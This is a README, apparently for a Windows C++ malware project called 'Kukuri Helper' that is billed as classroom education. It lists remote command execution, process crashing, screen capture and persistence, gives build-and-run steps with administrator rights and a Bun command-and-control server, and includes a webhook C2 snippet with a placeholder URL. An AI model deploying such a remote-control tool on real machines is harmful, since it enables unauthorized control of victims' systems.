This project demonstrates malware behavior for science education.
The code might not perfect.
π Understanding | Learn malware persistence mechanisms and Windows internals |
π Networking | Study communication patterns and C2 infrastructure |
π‘οΈ Defense | Practice cybersecurity defense techniques |
-
Process Control
- Remote command execution
- Process manipulation (crash/freeze)
- System monitoring
-
System Access
- Network connection control
- Volume manipulation
- Screen capture
- File system operations
- No data exfiltration
- No encryption features
- No propagation mechanisms
- Windows 10/11
- Visual Studio 2022
- C++20
- Administrator privileges
- Clone repository
- Open
Kukuri Helper.sln
in Visual Studio - Build solution in Release mode
- Run as Administrator
- Open
Server
folder - Run
bun Main.js
// Setup command & control
const string webhookUrl = "your-webhook-url";
Payload::SendMessage(webhookUrl, "Test message");
// Create embedded message
Payload::Embed embed;
embed.title = "Test Embed";
embed.description = "Embedded message";
Payload::SendEmbed(webhookUrl, embed);
A removal script is provided to clean the system:
- Terminates malware processes
- Removes startup entries
- Cleans registry modifications
- Deletes temporary files
- Restores system settings
This code is published for educational purposes as part of a controlled classroom environment. Any use outside of authorized educational contexts is strictly prohibited.
Made with β€οΈ | By Mikasuru